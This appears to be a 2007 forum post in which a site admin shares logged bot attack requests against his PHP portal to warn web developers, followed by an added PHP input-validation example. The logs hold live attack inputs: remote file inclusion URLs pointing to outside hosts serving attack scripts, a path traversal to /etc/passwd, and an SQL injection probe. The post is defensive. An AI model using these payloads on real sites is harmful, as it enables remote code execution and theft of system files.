
All times are UTC [ DST ]

Posted: Sun Sep 30, 2007 11:43 am  Post subject: Information for webdevelopers...
Site Admin
Joined: Sat Nov 02, 2002 1:35 am
Posts: 19753
Location: En España
I thought I'd publish some stats for people with websites about methods used by webbots to attack sites. On the frontpage it's a bespoke PHP portal, which secures every point of input and runs a lot of checks to make sure input is valid.

Anyways, if you're a web designer, here are some examples of basic attacks and why you have to secure any point of input. Validate and abort if the input isn't what's wanted... it's the least you can do for your users :)

Code:
IP:
Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)
Remote Address: 65.83.197.216
 Remote Port: 1440
---------
Query String: id=http://amyru.h18.ru/images/cs.txt?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: libwww-perl/5.79
Remote Address: 194.126.175.35
 Remote Port: 56104
---------
Query String: act=lirenews&id=http://www.freewebs.com/nuklir/alat/f.php??
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Remote Address: 58.71.1.35
 Remote Port: 46940
---------
Query String: section=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&id=481
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Remote Address: 222.197.173.53
 Remote Port: 4214
---------
Query String: section=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&id=481
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Remote Address: 86.106.16.178
 Remote Port: 1903
---------
Query String: section=../../../../../../../../../../../../../../etc/passwd
X-Forwarded: none
Script Name: /modules/links/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Remote Address: 140.130.156.81
 Remote Port: 2262
---------
Query String: section=movies&id=http%3A%2F%2Fwww.intel.com%3F&jYQAAtWq86=
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: Internet Explorer 6.0
Remote Address: 219.137.204.103
 Remote Port: 1156
---------
Query String: section=movies&id=481'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: libwww-perl/5.803
Remote Address: 81.171.105.6
 Remote Port: 55601
---------
Query String: id=http://edl.yoll.net/cmd.txt?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Code:
IP:
Agent: libwww-perl/5.79
Remote Address: 72.32.2.231
 Remote Port: 59365
---------
Query String: id=http://www.jonat.com/work/psv?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com


Just a short sample of recent attacks. I usually email the site admins of attack sites but found an overwhelming ignorance and hostility to the damage their site is doing. If you paste one of the odd URLs into your address bar, you'll usually find the method of attack, which is trying to get remote PHP to execute. Obviously the bots have attacked those sites and uploaded malicious code, so it's important that you do everything in your power to protect your site, not only for your site and your users, but also for every other site on the internet :)

I'll post novel attacks in this thread from time to time.

_________________
Mouse nipple for the win! Trackpoint or death!
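
The "validate and abort" rule from the post, applied to query strings like the logged ones, as an added example that is not part of the original post or the site's code. The parameter rules (numeric `id`, fixed lists for `section` and `act`) and the function name `validate_request` are assumptions, and the sample hosts are placeholders.

```php
<?php
// Added example, not the site's code; the parameter rules below are assumed.
const ALLOWED_SECTIONS = ['movies', 'music', 'games'];   // hypothetical list
const ALLOWED_ACTIONS  = ['view', 'list'];               // hypothetical list
function validate_request(string $queryString): array
{
    parse_str($queryString, $params);        // URL-decodes names and values
    $clean = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {            // id[]=1 would arrive as an array
            throw new InvalidArgumentException("$name: not a plain value");
        }
        switch ((string) $name) {
            case 'id':                       // digits only, bounded length
                $ok = preg_match('/\A[0-9]{1,9}\z/', $value) === 1;
                break;
            case 'section':                  // exact match against the list
                $ok = in_array($value, ALLOWED_SECTIONS, true);
                break;
            case 'act':
                $ok = in_array($value, ALLOWED_ACTIONS, true);
                break;
            default:                         // unknown names are rejected too
                throw new InvalidArgumentException("$name: unexpected parameter");
        }
        if (!$ok) {
            throw new InvalidArgumentException("$name: value not allowed");
        }
        $clean[$name] = $value;
    }
    return $clean;
}

// Constructed query strings modelled on the logged requests.
$samples = [
    'section=movies&id=481',
    'id=http://example.invalid/cs.txt?',
    'section=http%3A%2F%2Fexample.invalid%2Fdir%2F&id=481',
    'section=../../../../etc/passwd',
    "section=movies&id=481'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='",
];
foreach ($samples as $qs) {
    try {
        validate_request($qs);
        echo "ACCEPT  $qs\n";
    } catch (InvalidArgumentException $e) {
        echo "ABORT   $qs  (" . $e->getMessage() . ")\n";
    }
}
```

In a web script the abort branch would send a 400 response and stop before any include, file or database call sees the value.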

